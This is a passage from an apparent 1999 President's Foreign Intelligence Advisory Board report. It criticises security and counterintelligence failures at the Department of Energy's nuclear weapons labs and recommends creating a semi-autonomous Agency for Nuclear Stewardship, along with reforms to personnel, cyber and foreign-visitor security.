evaluate the new OCI Director’s 90–day study, and we are aware that Secretary Richardson did not assume his DOE duties until mid–August. However, we find
unacceptable the more than four months that elapsed before DOE advised the National Security Advisor on the actions taken and specific remedies developed to
implement the Presidential directive, particularly one so crucial.
More critically, we are disturbed by bureaucratic foot–dragging and even recalcitrance that ensued after issuance of the Presidential Decision Directive. Severe
disagreements erupted over several issues, including whether the CI program would apply to all of the labs, not just the weapons labs, and the extent to which
polygraph examinations would be used in the personnel security program. We understand that some DOE officials declined to assist in the implementation simply by
declaring that, “It won’t work.” The polygraph program was finally accepted into the DOE’s security reforms only after the National Security Advisor and the DCI
personally interceded. The fact that the Secretary’s implementation plan was not issued to the labs until more than a year after the PDD was issued tells us DOE is
still unconvinced of Presidential authority. We find worrisome the reports of repeated and recent resistance by Office of Management and Budget officials to
requests for funding to implement the counterintelligence reforms mandated by PDD-61. We find vexing the reports we heard of OMB budgeteers lecturing other
government officials on the “unimportance” of counterintelligence at DOE.
SECRETARY RICHARDSON’S INITIATIVES
Since November of 1998 and especially since April of this year, Secretary Richardson has taken commendable steps to address DOE’s security and
counterintelligence deficiencies. In November of last year, in the action plan required by PDD-61, Secretary Richardson detailed 31 actions to be taken to reform
DOE’s counterintelligence program. These actions addressed the structure of the counterintelligence program, selection and training of field counterintelligence
personnel, counterintelligence analysis, counterintelligence and security awareness, protections against potential “insider threats,” computer security, and relationships
with the FBI, the Central Intelligence Agency, and the National Security Agency.
Though many matters addressed in the action plan would require further evaluation before specific actions would be taken, immediate steps included granting to the
Office of Counterintelligence (OCI) direct responsibility for programming and funding counterintelligence activities of all DOE field offices and laboratories; granting
the Director, OCI the sole authority to propose candidates to serve as the counterintelligence officers at the weapons labs; and instituting a policy for a polygraph
program for employees with access to sensitive information.
In April of 1999, in an effort to eliminate multiple reporting channels and improve lines of communications, direction and accountability, Secretary Richardson
ordered changes in the department’s management structure. In short, each of the 11 field offices reports to a Lead Program Secretarial Office (LPSO). The LPSO
has “overall line accountability for site-wide environment, safety and health, for safeguards and security and for the implementation of policy promulgated by
headquarters staff and support functions.” A newly established Field Management Council is to be charged with program integration.
In May of 1999, Secretary Richardson announced substantial restructuring of the security apparatus at DOE. Among these is the new Office of Security and
Emergency Operations, responsible for all safeguards and security policy, cyber–security, and emergency functions throughout DOE. It will report directly to the
Secretary and consist of the Office of the Chief Information Officer, and Office of Emergency Management and Response, and an Office of Security Affairs, which
will include the Office of Safeguards and Security, the Office of Nuclear and National Security Information, the Office of Foreign Visits and Assignments, and the
Office of Plutonium, Uranium, and Special Material Inventory.
Also announced was the creation of the Office of Independent Oversight and Performance Assurance. It also will report directly to the Secretary to provide
independent oversight for safeguards and security, special nuclear materials accountability, and other related areas.
To support additional cyber-security improvements, DOE will be asking Congress for an additional $50 million over the next two years. Improvements are to include
continual monitoring of DOE computers for unauthorized and improper use. New controls will also be placed on computers and workstations, removable media,
removable drives, and other devices that could be used to download files. In addition, warning “banners” are now mandatory on all computer systems to alert users
that these systems are subject to search and review at the government’s discretion. Cyber–security training is also to be improved.
Secretary Richardson further announced additional measures designed to strengthen DOE’s counterintelligence program. They include: a requirement that DOE
officials responsible for maintaining personnel security clearances be notified of any information that might affect the issuance or maintenance of such a clearance,
even when the information does not rise to the level of a criminal charge; and mandatory reporting by all DOE employees of any substantive contact with foreign
nationals from sensitive countries. DOE also plans to strengthen its Security Management Board; accelerate actions necessary to correct deficiencies in security
identified in the 1997/1998 Annual Report to the President on Safeguards and Security; expedite improvements in the physical security of DOE nuclear weapons
sites; and delay the automatic declassification of documents more than 25 years old.
In sum, as of mid-June of 1999, progress has been made in addressing counterintelligence and security. Of note, all of the PDD–61 requirements are reported to
have been substantially implemented. Other important steps also reportedly have been completed. Among these are the assignment of experienced
counterintelligence officers to the weapons labs.
PROSPECTS FOR REFORMS
Although we applaud Secretary Richardson’s initiative, we seriously doubt that his initiatives will achieve lasting success. Though certainly significant steps in the right
direction, Secretary Richardson’s initiatives have not yet solved the many problems. Significant objectives, all of which were identified in the DOE OCI study
completed nearly a year ago, have not yet been fully achieved. Among these unmet objectives are revising the DOE policy on foreign visits and establishing an
effective polygraph examination program for selected, high–risk programs. Moreover, the Richardson initiatives simply do not go far enough.
These moves have not yet accomplished some of the smallest fixes—despite huge levels of attention and Secretarial priority. Consider the following example: with all
the emphasis of late on computer security, including a weeks–long stand–down of the weapons labs computer systems directed by the Secretary, the stark fact
remains that, as of the date of this report, a nefarious employee can still download secret nuclear weapons information to a tape, put it in his or her pocket, and walk
out the door. Money cannot really be the issue. The annual DOE budget is already $18 billion. There must be some other reason.
Under the Richardson plan, even if the new “Security Czar” is given complete authority over the more than $800 million ostensibly allocated each year to security of
nuclear weapons-related functions in DOE, he will still have to cross borders into other people’s fiefdoms, causing certain turmoil and infighting. If he gets no direct
budget authority, he will be left with little more than policy guidance. Even then, as the head of a staff office, under the most recent Secretary Richardson
reorganization he has to get the approval of yet another fiefdom, the newly created Field Management Council, before he can issue policy guidance. Moreover, he is
unlikely to have much success in obtaining approval from that body when he is not even a member—and the majority of those who are members are the very
program managers that his policy guidance would affect.
TROUBLE AHEAD
Perhaps the most troubling aspect of the PFIAB’s inquiry is the evidence that the lab bureaucracies—after months at the epicenter of an espionage scandal with
serious implications for U.S. foreign policy—are still resisting reforms. Equally disconcerting, other agencies have joined the security skeptics list. In the past few
weeks, officials from DOE and other agencies have reported to us:
There is a heightened attention to security at the most senior levels of DOE and the labs, but at the mid–level tiers of management there has been
lackluster response and “business as usual.”
Unclassified but sensitive computer networks at several weapons labs are still riddled with vulnerabilities.
Buildings that do not meet DOE security standards are still being used for open storage of weapons parts.
Foreign nationals—some from sensitive countries—residing outside a weapons lab have remote dial-up access to unclassified networks without any
monitoring by the lab.
In an area of a weapons lab frequented by foreign nationals, a safe containing restricted data was found unsecured. It had not been checked by guards
since August 1998. When confronted with the violation, a mid–level official is said to have implied that it was not an actual security lapse because the
lock had to be “jiggled” to open the safe door.
A weapons lab was instructed to monitor its outgoing email for possible security lapses. The lab took the minimal action necessary; it began monitoring
emails but did not monitor the files attached to emails.
When Secretary Richardson ordered the recent computer stand-down, there was great resistance, and when it came time to decide if the labs’
computers could be turned on again, a bevy of DOE officials fought to have final approval power.
BACK TO THE FUTURE
In 1976, federal officials conducted a study of the nation’s nuclear weapons laboratories and plants. In trying to devise a coherent and viable way of managing the
labs, they settled on three possible solutions: place the weapons labs under the Department of Defense, make them a free–standing agency, or leave them within the
Energy Research and Development Administration. Congress chose to leave the weapons labs within ERDA, the successor agency of the Atomic Energy
Commission.
Nearly a decade later, the oversight of the weapons labs was still of great concern. Senators Sam Nunn and John Warner led a push to place the weapons labs
under the auspices of the Department of Defense. However, the Reagan Administration staved off their effort by agreeing to put together a blue–ribbon panel to
study the issue. The panel studied the problem for six months and issued a report in July, 1985. Again, Congress and federal officials weighed whether the weapons
labs should be transferred to the Department of Defense or restructured to be given more autonomy.
The status quo prevailed. The weapons labs stayed within the Department of Energy.
As this report has detailed, problems in the managerial relationship between DOE and the weapons labs have persisted, perhaps even increased, over the past 14
years. Indeed, the discussion today sounds hauntingly familiar to the discussions in the 1980s and 1970s.
Today, however, there is a difference. The record of mismanagement of the weapons labs in matters of security and counterintelligence has become so long and so
compelling as to demand a rejection of the status quo. There can be no doubt that the current structure of the Department of Energy has failed to give the nation’s
weapons laboratories the level of care and attention they warrant. Thus, our panel is recommending deep and lasting structural change that will give the weapons
laboratories the accountability, clear lines of authority, and priority they deserve.
REORGANIZATION
What makes a government agency run well? There are a multitude of characteristics that arguably can make for an efficient and effective government agency or
department. This Panel holds no illusions about the completeness of its understanding nor the purity of its wisdom regarding government bureaucracies. Indeed, some
people would say that truly comprehending the inner workings of a federal department is the intellectual equivalent of grasping the enormity of the universe. Over the
course of many years, however, we, as members of the President’s Foreign Intelligence Advisory Board, have evaluated the performance of numerous federal
entities, from the Department of Defense to the Foreign Broadcast Information Service. Some, we found, were in good order, others in pretty bad shape. In that
sense, we believe we do know a lot about what makes some agencies work and not work. Although somewhat subjective and by no means exhaustive, our list of
“good” things to look for includes several attributes.
LEADERSHIP
Certainly at the top, but also throughout the organization. The leaders and managers set the standards and expectations regarding performance and accountability.
They are the foundation upon which a successful organizational culture is built. If management sets, demonstrates and enforces high standards for performance and
accountability, there is a strong likelihood that the organization will follow. And, longevity is a key ingredient. For example, Daniel S. Goldin, Administrator of the
National Aeronautics and Space Administration (NASA), was named to his post in the spring of 1992. Goldin has won considerable acclaim for demanding nothing
but the best from his employees, and thereby turning around a bureaucracy that had become ossified and recalcitrant to higher authority, including the President. He
did not do it overnight, though. His “watch” is now seven years long and still going. By contrast, the average stay for an Energy Secretary has been about two and a
half years; a Deputy Secretary, less than two years; and an Under Secretary, less than 18 months.1
CLARITY OF MISSION
Employees must know who they are and why they are there. Mission statements may seem corny to some, but from our experience good ones work. NASA’s is
crisp, clear and bold: “NASA is an investment in America’s future. As explorers, pioneers and innovators, we boldly expand frontiers in air and space to inspire and
serve America, and to benefit the quality of life on Earth.” The Energy Department also declares itself a department of the future; it’s slogan is “Science, Security and
Energy: Powering the 21st Century.” However, we wonder if the DOE employees in the field really have a sense of purpose and direction. Those at the Oakland
Operations Office are challenged to, “serve the public by executing programs and performing DOE contract management.” At Albuquerque Operations Office, the
rallying cry is, “to contribute to the welfare of the nation by providing field-level federal management to assure effective, efficient, safe and secure accomplishment of
the Department’s national defense, environmental quality, science and technology, technology transfer and commercialization and national energy objectives.”2
DEDICATION TO EXCELLENCE
It is the responsibility of leadership to emphasize continuously and top-to-bottom the absolute importance of quality of performance. People truly dedicated to
excellence usually achieve it.
EMPHASIS ON CORE COMPETENCIES
Those agencies that constantly emphasize the business areas in which they must absolutely excel, usually do so. At NASA, we are told, rarely, if ever, does the
Administrator give a speech in which safety is not emphasized. DOE has appropriately emphasized excellence in the quality of its scientific and technical work, but
only recently has begun to emphasize security, and only in recent months has articulated the importance of counterintelligence. The panel was hard pressed to find
either words mentioned in speeches by most of Secretary Richardson’s predecessors.
MINIMAL POLITICAL PRESSURES
Blessed is the government manager whose operations fall into only a handful of Congressional districts and under the purview of only a couple of oversight
committees. It doesn't take a nuclear scientist to understand that the more Congressional districts and committees with which a federal agency must contend, the
more it is politically whip–sawed in its priorities and stuffed with pork. We suspect the Department of Energy probably holds some federal records: its multitudinous
and widely cast operations come under the scrutiny of no less than 18 Congressional committees and fund well-paying federal and contractor jobs in more than 50
congressional districts.
STREAMLINED FIELD OPERATIONS
In just about any endeavor, but especially in managing government contracts, simpler is better. Managing government contracts has become a major function in more
and more agencies and departments as they seek to cut costs. We know of a few good examples of agencies where this effort is both efficient and effective.
One is the National Reconnaissance Office (NRO), a semi-autonomous Defense Department agency, which has long managed huge contracts with major industrial
firms that have built and help operate our nation's surveillance satellites. The NRO, however, came under heavy fire several years ago for budget irregularities, partly
as a result of tangled lines of bureaucratic authority. Today, after some substantial streamlining, multi-million dollar contracts are run out of program management
offices at NRO Headquarters on a line of accountability leading directly to the contracting company. Rather than maintaining large field offices, the NRO employs
only a handful of representatives in the field—typically only one or two people resident at their largest contractors. The rest is done from Washington. To manage
their largest contracts, no more than 15 contracting officers—from worker–level to management —are involved. Some are worth several billion dollars. Currently,
the NRO manages over 1,000 contracts worldwide, with a combined value numbering in the tens of billions of dollars. They manage these contracts using a staff of
approximately 250 contract officers.3
Though we acknowledge that there are differences between the missions of NRO’s satellite contractors and DOE’s nuclear weapons lab contractors, we are
stunned by the huge numbers of DOE employees involved in overseeing a weapons lab contract. For example, Sandia National Weapons Laboratory, a
contractor–operated facility in New Mexico, has several layers of Energy Department employees with whom it must deal: the Kirtland (Air Force Base) Area Office,
with about 55 “feds,” which is subordinate to the Albuquerque Field Office (AFO), which has a total complement of about 1,300 government workers. Albuquerque
also monitors contracts with Los Alamos National Lab (through a Los Alamos Area Office of some 70 people), and several other contractors throughout the
southern United States. Notably, Albuquerque is but one of 11 such DOE Field Offices, that boast a total field complement of about 6,000. Back at DOE
Headquarters, which has a total work force of close to 5,000, Sandia’s contracts are monitored, depending on the subject, by several Program Offices—including
Defense Programs (somewhat over 100 officials) and Environmental Management (somewhat over 200 officials).
We repeatedly heard from officials at various levels of DOE and the weapons labs how this convoluted and bloated management structure has constantly transmitted
confusing and often contradictory mandates to the labs. This is vividly illustrated by the labyrinthine organizational charts that one must decipher to trace lines of
authority.
RESPONSIBILITY AND ACCOUNTABILITY IN SECURITY
One senior CIA official told us that the NRO security system is the best in the government—a view echoed, we understand, in a forthcoming report by the
DCI/Defense Secretary Joint Security Commission. One can see why. At the NRO, security starts at the top. The chief of security provides policy guidance and
monitors implementation. However, from the Director on down, all line managers are responsible for implementation. If a security breach occurs, the Director and
appropriate line subordinates all are accountable. Similarly, NRO contractors are expected to meet fully NRO security standards and guidelines. Failure to meet
those guidelines could well result in forfeiture of performance award fees, at the least.
FULL OPERATIONAL INTEGRATION
To be effective, security must be more than a concept, it must be woven into every aspect of the agency’s business and the daily work of every employee. The NRO
integrates security more fully than most other federal agencies we have seen. Though it has separate line items for security and counterintelligence functions, most
security–related expenditures are integrated directly into the line items of every satellite program. Thus, rather than imposing security mandates as contract
“add-ons,” security officials work with the NRO managers to fold their requirements into a given program during the planning stages. In this structure, security
requirements are as much a part of an NRO satellite program as are solar cells and thrusters. And, the NRO security professionals, rather than treated as staff
functionaries, are accepted as true partners in the NRO mission.
A PREVAILING CONSCIOUSNESS
Making people aware is vital. The record clearly shows that DOE has had mixed results from its various security and counterintelligence indoctrination programs.
Briefings, town hall meetings and educational films are helpful, but they cannot take the place of a working environment in which security is just part of the daily
routine. Again at the NRO, when a management decision is made, security always gets a voice. A security official is present at every level of NRO decision making:
from the Office Director, to his Board of Directors, to the management teams of the smallest NRO program, security officials are part of the management process.
Moreover, “security” gets a vote equal to that of any program manager. From the record, we judge that security at DOE, until recently, only occasionally had a
voice; and when it did, many managers vociferously objected. Counterintelligence, on the other hand, was allowed little more than a whisper.
RESTRUCTURING
The panel is convinced that real and lasting security and counterintelligence reform at the weapons labs is simply unworkable within DOE’s current structure and
culture. To achieve the kind of protection that these sensitive labs must have, they and their functions must have their own autonomous operational structure free of all
the other obligations imposed by DOE management. We strongly believe that this cleaving can best be achieved by constituting a new government agency
that is far more mission–focused and bureaucratically streamlined than its antecedent, and devoted principally to nuclear weapons and national
security matters.
The agency can be constructed in one of two ways. It could remain an element of DOE but become semi-autonomous—by that we mean strictly segregated from
the rest of the department. This would be accomplished by having the agency director report only to the Secretary of Energy. The agency directorship also could be
“dual-hatted” as an Under Secretary, thereby investing it with extra bureaucratic clout both inside and outside the department.
We believe there are several good models for this course of action: the National Security Agency and the Defense Advanced Research Projects Agency, both
elements of the Defense Department; and the National Oceanographic and Atmospheric Administration, an agency of the Commerce Department. Alternatively, the
agency could be completely independent, with its administrator reporting directly to the President. The National Aeronautics and Space Administration and the
National Science Foundation are also good models.
Regardless of the mold in which this agency is cast, it must have staffing and support functions that are autonomous from the remaining operations at DOE. These
functions, which report directly to the Director, must include: an inspector general; a general counsel; a human resources staff; a comptroller; a senior official
responsible solely for security policy, and another responsible solely for counterintelligence policy. To protect its autonomy and avoid the diversion of funds to other
purposes, the agency budget must be a separate line item strictly segregated by Congress from other budget pressures—even if it remains nominally within the
current DOE structure. The agency also must have a separate employee career service. The panel recommends an “excepted service” model of employment, like
many of the intelligence community elements, which would facilitate accountability and higher performance levels by allowing management to reward, punish, hire,
and fire employees more easily.
To ensure its long–term success, this new agency must be established by statute. That statute, moreover, must clearly stipulate that nothing less than an act of
Congress can amend the agency’s mission, functions or affiliations. Clearly, Congress and the President must decide definitively which of these two solutions to
enact. The panel has no specific preference between them; we believe either can be made effective. Should Congress and the President conclude that retaining the
agency inside DOE is not workable, the “wholly-independent” approach should be enacted.
We emphasize that it is very important for the new structure to be organized to preserve and, if possible, enhance the ability of the national weapons labs to attract
and retain scientists of the highest caliber. Excellence in the caliber of the scientists and their research and development programs must be sustained if the weapons
labs are to fulfill their missions in the front line of U.S. national security. To meet this goal, continued but carefully controlled interaction with foreign visitors and
scientists from around the world as well as with researchers from DOE’s nondefense labs is essential for producing the best science. In the semi-autonomous model,
the Secretary would be responsible for managing and ensuring the effectiveness of agency relations with the nonweapons labs.
Whichever solution Congress enacts, we do feel strongly that the new agency never should be subordinated to the Defense Department. Defense already is
populated with a number of semi–autonomous agencies; we see no reason to add to that burden. Moreover, we believe the decision made long ago to house
America’s nuclear weapons research and development in a civilian government agency still makes sense. Specifically, we recommend that the Congress pass
and the President sign legislation that:
Creates a new, semi–autonomous Agency for Nuclear Stewardship (ANS), whose Director will report directly to the Secretary of Energy.
The Director should be dual–hatted as an Under Secretary of Energy. This new agency will oversee all nuclear weapons–related matters previously
housed in DOE, including Defense Programs and Nuclear Nonproliferation; it also will oversee all functions of the National Weapons labs. (If Congress
opts to create a totally independent agency, the Director should report directly to the President.)
Streamlines the ANS/Weapons Lab management structure by abolishing ties between the weapons labs and all DOE regional, field and
site offices, and all contractor intermediaries. The so–called “GOCO,” or “government owned, contractor operated,” concept of lab management
should be retained. GOCO has been very successful, particularly in providing employment conditions that attract scientists of the highest caliber, and
the federal government is strongly committed to maintaining that working relationship. Even if DOE opts to retain these field entities for other purposes,
the ANS should sever all association with them. All ANS/Weapons Lab communications and business should be handled by ANS Liaison Offices
established in each lab and manned with a small staff. (Our short review time did not permit us to explore fully this issue. We doubt that any amount of
time would be sufficient. Suffice it to say that we did learn enough about the costs and benefits of these myriad DOE field bureaucracies to persuade us
to recommend cutting all ties between them and the new agency.)
Mandates that the Director/ANS be appointed by the President with the consent of the Senate and, ideally, have an extensive background in
national security, organizational management, and appropriate technical fields. Admittedly, finding an individual with solid credentials in all three areas
may prove an elusive goal. However, meeting two out of those three criteria should be considered mandatory, provided that one of the criteria always
met is management experience. The Deputy Director should have a background in an area that compensates for areas in which the Director lacks
experience. The Director should serve for a minimum fixed term of 5 years, not coincident with quadrennial transitions of administrations, and be
subject to removal only by Presidential direction.
Stems the historical “revolving door” and management expertise problems at DOE by severely circumscribing the number of political
appointees assigned to ANS and requiring all ANS senior political appointees to have strong backgrounds in both national security (intelligence,
defense, or foreign policy) and management (corporate, government, or military).
Ensures effective administration of safeguards, security, and counterintelligence at all the weapons labs and plants by creating a
coherent security/CI structure within the new agency. We strongly recommend following the NRO’s model of security management. The senior
CI official at ANS—we recommend a Special Assistant to the Director for CI policy—should be mandated as a permanent FBI senior executive
service position.
Abolishes the Office of Energy Intelligence. A Special Assistant to the ANS Director for Intelligence Liaison should be created within the new
agency, with a staff of no more than 20. The Special Assistant should be responsible for managing relations with the intelligence community, briefing
ANS senior management on intelligence matters, and ensuring ANS intelligence requirements are met. This office should follow the Treasury
Department model. (The Secretary of Energy would not be precluded from establishing a similar special assistant to address the department’s
non-weapons–related intelligence coordination and briefing needs.)
Shifts the balance of analytic billets from the former Office of Energy Intelligence (about 40) to the DCI’s Nonproliferation Center to bolster intelligence
community technical expertise on nuclear matters. These billets should be permanently funded by ANS, but permanently assigned to the DCI Center.
Weapons lab employees and ANS civil servants should be temporarily assigned to these positions for two year tours.
A Semi-Autonomous or Wholly Independent Nuclear Weapons Stewardship Agency should have the following attributes:
The agency would be entirely separated from DOE, except in the semi-autonomous case, where the agency director—as a DOE Under Secretary—would report
directly to the Secretary.
The agency would have no other bureaucratic ties to DOE, other than R&D contracting, which would be managed by the agency Deputy Director. The weapons
labs would be encouraged nonetheless to foster strong scientific interactions with the other DOE research labs. In the case of a wholly independent agency, the
Director would be the chief executive officer.
In the case of a semi-autonomous agency, the Director would be dual-hatted as a DOE Under Secretary.
An independent oversight board would monitor performance and compliance to agency policies and guidelines, up and down the organizational structure.
Authority from the agency Director to the weapons labs would run directly through the Deputy Director, who also would be dual-hatted as the Defense Programs
Manager and, therefore, a manager of lab work.
The security chief, directly reporting to the agency Director, would promulgate all security policies and guidelines for the agency and the weapons labs, including
safeguards and cyber-security.
The counterintelligence chief, also directly attached to the agency Director, would promulgate all counterintelligence policies and guidelines for the agency and the
weapons labs. He/she also would manage the foreign visitors and assignments program.
As Defense Programs Manager for the weapons labs, the agency Deputy Director would be responsible for ensuring the integration of all security and
counterintelligence policies and guidelines into all weapons lab programs.
Security officers and counterintelligence officers would be attached to all line offices, with heavy representation in Defense Programs, where full integration would
occur. They also would be attached to all labs, in multiple numbers.
Security and counterintelligence officers would report to their appropriate line managers on a day-to-day basis, but also report respectively to the agency security
and counterintelligence chiefs on policy implementation issues. All policy implementation disputes would be referred back to the agency director for resolution.
ADDITIONAL RECOMMENDATIONS
There are a number of initiatives that must be undertaken immediately to start building a new agency culture and identity and restoring public confidence:
Establish a clear mission and clear standards of excellence. The agency’s mission, and that each subordinate unit, must be clearly articulated. Strong
security and counterintelligence in addition to scientific achievement must be core elements of the mission. Similarly, clear standards of excellence must
be established throughout the organization. Excellence must be the goal of scientists, engineers, technicians, and managers as well as security and
counterintelligence officials.
Establish a clear chain of accountability. There must be clear, simple, indelible lines of accountability from top to bottom. If a failure occurs, there must
be a straightforward means for determining accountability—at all levels. Seeking consensus and advice is important, but ultimately a decision must be
made by individuals, and those individuals should be held accountable.
Hold leaders accountable. Accountability must be enforced, particularly among the agency managers who will form the backbone of the new agency
and instill a new culture of excellence.
Reward achievement. Criteria should be clear and rewards substantial. Protection of nuclear secrets and expansion of scientific knowledge should be
among the most valued. Achievement must be judged on contribution to mission, not to program expansions or budget increases.
Punish failure ... with severity, if necessary. Penalties should be tough, but fair and proportional. Laxity in protecting nuclear secrets and other sensitive
information should be among the most severely punished.
Train and educate. Establish a formal educational and training system to develop a professional cadre of career managers and leaders. Security and
counterintelligence should be major parts of the core curriculum passed down to all lab personnel in regular briefings and training sessions.
Do not forget the primary mission. Preserve and strengthen those agency attributes—including cutting edge research in the most advanced scientific
fields—that will attract the finest talent in the nation. With respect to the weapons laboratories, continue to foster their unparalleled lead in intellectual
excellence. But never lose sight that protecting the nation by securing its nuclear stockpile and nuclear secrets—through good science and good
management—is Job Number One.
While maintaining its autonomy, the agency should nonetheless emphasize continued close scientific interaction with the DOE research labs not engaged
in weapons–related endeavors. In the semi–autonomous alternative, DOE should also be responsible for ensuring that good relations are maintained
between the non-weapons labs and the weapons labs.
SECURITY AND COUNTERINTELLIGENCE ACCOUNTABILITY
Accountability. The agency director should issue clear security accountability guidelines. The agency security chief must be accountable to the agency
director for security policy at the labs, and the lab directors must be accountable to the agency director for compliance. The same system and process
should be established to instill accountability among counterintelligence officials.
Independent Oversight. Attentive, independent oversight will be critical to ensuring high standards of security and counterintelligence performance at the
new agency. In that regard, we welcome Senator John Warner’s recent legislative initiative to create a small, dedicated panel to oversee security and
counterintelligence performance at the weapons labs. This oversight should include an annual certification process.
Joint Committee for Congressional Oversight of ANS/Labs. Congress should abolish its current oversight system for the national weapons labs. Just as
the profligate morass of DOE contractors and bureaucrats has frustrated the critical national interest of safeguarding our nuclear stockpile, so has the
current scheme of Congressional oversight with roughly 15 competing committees laying claim to some piece of the nuclear weapons mission.
ANS Inspector General. The President, Congress, and the director of the new agency should cooperatively, through executive order, legislation, and
agency directive, provide teeth to the authority of the new agency’s inspector general. For example, the inspector general, the independent oversight
body, and the agency director should all have to concur on the findings of the annual report to the President on safeguards and security at the weapons
labs.
EXTERNAL RELATIONS
The CIA and FBI should expand their “National Security Partnership” to include the new agency and the weapons labs. Reciprocal assignment
programs should be implemented to promote cross-fertilization of expertise and experience.
CIA and DIA should bolster their support for ANS needs. Both intelligence agencies should establish analytic accounts to support the specific
substantive and counterintelligence interests and needs of the new ANS and the weapons labs. These accounts, among other issues, should regularly
produce data on the nuclear–related collection efforts of all foreign governments and foreign intelligence services. This data should serve as the
foundation for regularized weapons lab counterintelligence briefs for the foreign visits/foreign visitors programs.
Improve national security and law enforcement cooperation, particularly with respect to counterintelligence case referrals and handling. The National
Security Council should take the lead in establishing clear Executive Branch guidelines and procedures for resolving disputes between agencies over law
enforcement and national security concerns. A government–wide process needs to be established by which competing interests can be adjudicated by
officials who are properly informed of all relevant facts and circumstances, but who also are sufficiently senior to make decisions stick.
Ensure a government–wide review of legal tools to address the current foreign intelligence threat. The National Security Council should conduct a
review to ensure that sufficient legal authority and techniques are available and appropriate in light of the evolution of a very sophisticated threat and the
ongoing revolution in information systems.
PERSONNEL SECURITY
An effective personnel security program. The agency director should immediately undertake a total revamping of the “Q” clearance program and look
to the security elements in the intelligence community for advice and support. This review should result in a complete rewrite of existing guidance and
standards for the issuing, revoking and suspending of security clearances. Special attention should be paid to establishing a clear—and relatively
low—threshold for suspending clearances for cause, including pending criminal investigations. The review also should significantly strengthen the
background investigation process by restructuring contracts to create incentives for thoroughness. We strongly advocate abolishing the prevalent
method of paying investigators “by the case.” Strict “need–to–have” regulations should be issued for regular reviews of all contract employees
clearance requirements. Those without a continuing need should have their clearances withdrawn. The National Security Council should review and
resolve issues on a government–wide basis that permit a person who is under FBI investigation for suspected espionage to obtain a new or renewed
clearance; existing standards for clearance renewal also should be reviewed with an eye toward tightening up.
A professional administrative inquiry process. Promulgate new agency guidelines and standards for security–related administrative inquiries to ensure
that proper security/counterintelligence procedures and methods are employed. Very high professional qualification standards should be established and
strictly maintained for all security personnel involved in administrative inquiries.
PHYSICAL/TECHNICAL/CYBERSECURITY
Comprehensive weapons lab cyber–security program. Under the sponsorship and specific guidance of the agency Director, the weapons labs should
institute a broad and detailed program to protect all computer workstations, networks, links and related systems from all forms of potential
compromise. This program, which should be reviewed by and coordinated with appropriate offices within the U.S. intelligence community, must include
standard network monitoring tools and uniform configuration management practices. All lab computers and networks must be constantly monitored and
inspected for possible compromise, preferably by an agency–sponsored, independent auditing body. A “best practices” review should be conducted
yearly by the appropriate agency security authority.
Comprehensive classified document control system. Document controls for the most sensitive data of the weapons labs should be reinstituted by the
agency Director. The program should be constantly monitored by a centralized agency authority to ensure compliance.
A comprehensive classification review. The new agency, in coordination with the intelligence community, should promulgate new, concise, and precise
classification guidance to define and ensure awareness of information and technologies that require protection. This guidance should clear up the
widespread confusion over what is export–controlled information; what information, when joined with other data, becomes classified; and the
differences between similarly named and seemingly boundless categories such as “unclassified controlled nuclear information” and “sensitive but
unclassified nuclear information.”
BUSINESS ISSUES
Make security an integral part of doing business. Security compliance must be a major requirement in every agency contract with the weapons labs.
Rather than a detailed list of tasks, the contract should make clear the security and counterintelligence standards by which the lab will be held
accountable. It is the responsibility of the lab to develop the means to achieve those objectives. If a lab fails to conform to these standards and
requirements, the agency should withhold performance award fees.
Review the process for lab management contracts. If the agency director has reason to open the bidding for lab management contracts, we strongly
recommend an intensive market research effort. Such an effort would help ensure that legitimate and competent bidders, with strong records for
productive research and development, participate in the competition.
Weapons labs foreign visitors program. This productive program should continue, but both the agency and the weapons labs, in concert, must ensure
that secrets are protected. This means precise policy standards promulgated by the agency to ensure: the integrity of the secure areas and control over
all foreign visitors and assignees; a clear demarcation between secure and open areas at the labs; strong enforcement of restrictions against sensitive
foreign visitors and assignees having access to secure facilities; and sensible but firm guidelines for weapons lab employees’ contacts with foreign
visitors from sensitive countries. Exceptions should be made by the agency director on a case–by–case basis. Clear, detailed standards should be
enforced to determine whether foreign visits and appointments receive approval. The burden of proof should be placed on the employees who propose
to host visitors from sensitive countries. Visits should be monitored by the labs and audited by an independent office. The bottom line: treat foreign
visitors and assignees with the utmost courtesy, but assume they may well be collecting information for other governments.
Foreign travel notification. The agency should institute a program whereby all agency and weapons lab employees in designated sensitive positions must
make written notification of official and personal foreign travel well before departure. The agency must keep close records of these notifications and
also ensure that effective counterintelligence briefings are provided to all such travelers. Unless formally granted an exception, scientists for weapons
labs should travel in pairs on official visits to sensitive countries.
Counterintelligence. The FBI should explore the possibility of expanding foreign counterintelligence resources in its field offices nearby the weapons
labs. The panel offers additional thoughts for improving the Department’s CI efforts in the Classified Appendix to this report.
ENDNOTES
CHAPTER: ROOT CAUSES
1 The Department of Energy National Weapons Labs and Plants discussed in this report are: Lawrence Livermore National Lab, California; Los Alamos National
Lab, New Mexico; Sandia National Lab, New Mexico; PANTEX Plant, Texas; Kansas City Plant, Missouri; Oak Ridge (Y-12) Plant, Tennessee.
2 Boyer, Paul. By the Bomb’s Early Light: American Thought and Culture at the Dawn of the Atomic Age. Chapel Hill: University of North Carolina Press, 1985, p.
138.
3 National Science Foundation, “Science and Engineering Indicators,” 1996.
4 National Science Foundation, “Data Brief,” Vol. 1996, No. 9, August 19, 1999.
5 Classified report.
6 Classified DOE Report.
7 DOE, “Annual Report to Congress, 1978,” April 1979.
8 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,”
March 1998.
CHAPTER: RECURRING VULNERABILITIES
1 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,”
March 1998.
2 Classified DOE Report.
3 Classified DOE Report.
4 Classified DOE Report.
5 Classified DOE Report.
6 DOE, Office of Counterintelligence, “The Foreign Intelligence Threat to Department of Energy Personnel, Facilities and Research, Summary Report,” August
1990.
7 Classified U.S. Government report.
8 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997.
9 Hewlett, Richard G. and Francis Duncan, “Atomic Shield: A History of the U.S. Atomic Energy Commission,” May 1969.
10 Classified DOE report.
11 DOE, “Office of Safeguards and Security, Report to the Secretary: Status of Safeguards and Security,” February 1993.
12 Classified FBI document.
13 Classified U.S. Government report.
14 Classified DOE report.
15 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1993,” January 1994 (U).
16 DOE/IG-385, “Special Audit Report on the Department of Energy’s Arms and Military-Type Equipment,” February 1, 1996.
17 Classified DOE report.
